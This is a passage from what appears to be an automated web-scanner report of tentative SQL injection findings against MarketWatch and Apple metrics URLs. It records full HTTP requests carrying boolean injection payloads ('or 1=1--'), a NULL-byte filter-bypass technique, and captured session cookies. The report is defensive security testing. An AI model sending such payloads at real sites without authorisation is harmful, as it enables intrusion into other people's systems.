Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:10 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

1.83. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i3.marketwatch.com
Path:   /MW5/content/story/css/story-typography.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /MW5/content/story/css/story-typography.css'%20and%201%3d1--%20?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:14 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

Request 2

GET /MW5/content/story/css/story-typography.css'%20and%201%3d2--%20?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE3
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.84. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i4.marketwatch.com
Path:   /MW5/content/story/css/story-layout.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16831912'%20or%201%3d1--%20 and 16831912'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /MW516831912'%20or%201%3d1--%20/content/story/css/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:05 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

Request 2

GET /MW516831912'%20or%201%3d2--%20/content/story/css/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE1
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:05 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.85. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i4.marketwatch.com
Path:   /MW5/content/story/css/story-layout.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 65568828'%20or%201%3d1--%20 and 65568828'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /MW5/content65568828'%20or%201%3d1--%20/story/css/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:06 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

Request 2

GET /MW5/content65568828'%20or%201%3d2--%20/story/css/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE1
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.86. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i4.marketwatch.com
Path:   /MW5/content/story/css/story-layout.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 98828279'%20or%201%3d1--%20 and 98828279'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /MW5/content/story/css98828279'%20or%201%3d1--%20/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE3
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /MW5/content/story/css98828279'%20or%201%3d2--%20/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:09 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

1.87. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i4.marketwatch.com
Path:   /MW5/content/story/css/story-layout.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads 18043717'%20or%201%3d1--%20 and 18043717'%20or%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /MW5/content/story/css/story-layout.css18043717'%20or%201%3d1--%20?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE1
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /MW5/content/story/css/story-layout.css18043717'%20or%201%3d2--%20?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:09 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

1.88. http://metrics.apple.com/b/ss/applesuperglobal/1/H.20.3/s79162857956252 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.apple.com
Path:   /b/ss/applesuperglobal/1/H.20.3/s79162857956252

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/applesuperglobal%00'/1/H.20.3/s79162857956252?AQB=1&ndh=1&t=14/4/2011%205%3A29%3A21%206%20300&ce=ISO-8859-1&pageName=SEO-Software-US-Dow%20Jones%20%26%20Company%2C%20Inc.-WSJ%20House%20of%20the%20Day-418203198&g=http%3A//itunes.apple.com/us/app/wsj-house-of-the-day/id418203198&r=http%3A//online.wsj.com/article/SB10001424052748703730804576317293981683266.html&ch=SEO&products=Dow%20Jones%20%26%20Company%2C%20Inc.-WSJ%20House%20of%20the%20Day-418203198&h5=appleitmsna%2Cappleitmsus&c12=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/534.24%20%28KHTML%2C%20like%20Gecko%29%20Chrome/11.0.696.68%20Safari/534.24&v12=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/534.24%20%28KHTML%2C%20like%20Gecko%29%20Chrome/11.0.696.68%20Safari/534.24&c22=HTML&v22=HTML&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1020&bh=945&AQE=1 HTTP/1.1
Host: metrics.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/wsj-house-of-the-day/id418203198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jn1gkyeJ1WKAlCZEVc4LTWOfoR5KzzgHeAS7hqzHSMuCOpjB1psKNSFmvBLqyWuIDgDAgaXM5JpHh4udrWFoym8ywkMe0Kn1wT4dLyW3KPKmkY0ThNgc2x8Up3Hy0uGQv9XS9/uFl0bfYMMFdjbMvt7YuOHgtMBideElnGiWCHyeqIKhFqXhGr1Grw+cB8rZ2gMClHyV6alKgEA6Q/COnKjWRwmLlfQpesPEkWCyHOtj4AjkN3akBjLIeCZ2wv622Hx2afLIrdjCrUT0iM3fHP3tcn7/btTMnxrruETy4/we6WQEWWvjTvDv0yd5N8cR2Rbco2+Tilbkww6BqH43XkmL42Wt2JNXOnSflhuUiOMtvHdQCGYMe6T5mY/mNSsdyklww8Kud0eb4fFljXNTbUtdtuWgkxBCPo6dkWsHrflR2tFRNtkRtZ+g0aJTSDkInSE/Czbu3gdnyOsSEfwpOaxw21Vu2x8UWKtlYKeQjDdX0rQgSZq/5qExOPsga0vr//N+mkUjL0RBsNjgxkht+R1IEJxOY1QdHJZK28NiEOyihHRnn6Ho29zPNKwFGORx; geo=US; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 11:31:03 GMT
Server: Omniture DC/2.0.0
Content-Length: 416
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/applesuperglobal was not found on this server.<
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/applesuperglobal%00''/1/H.20.3/s79162857956252?AQB=1&ndh=1&t=14/4/2011%205%3A29%3A21%206%20300&ce=ISO-8859-1&pageName=SEO-Software-US-Dow%20Jones%20%26%20Company%2C%20Inc.-WSJ%20House%20of%20the%20Day-418203198&g=http%3A//itunes.apple.com/us/app/wsj-house-of-the-day/id418203198&r=http%3A//online.wsj.com/article/SB10001424052748703730804576317293981683266.html&ch=SEO&products=Dow%20Jones%20%26%20Company%2C%20Inc.-WSJ%20House%20of%20the%20Day-418203198&h5=appleitmsna%2Cappleitmsus&c12=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/534.24%20%28KHTML%2C%20like%20Gecko%29%20Chrome/11.0.696.68%20Safari/534.24&v12=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/534.24%20%28KHTML%2C%20like%20Gecko%29%20Chrome/11.0.696.68%20Safari/534.24&c22=HTML&v22=HTML&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1020&bh=945&AQE=1 HTTP/1.1
Host: metrics.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/wsj-house-of-the-day/id418203198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
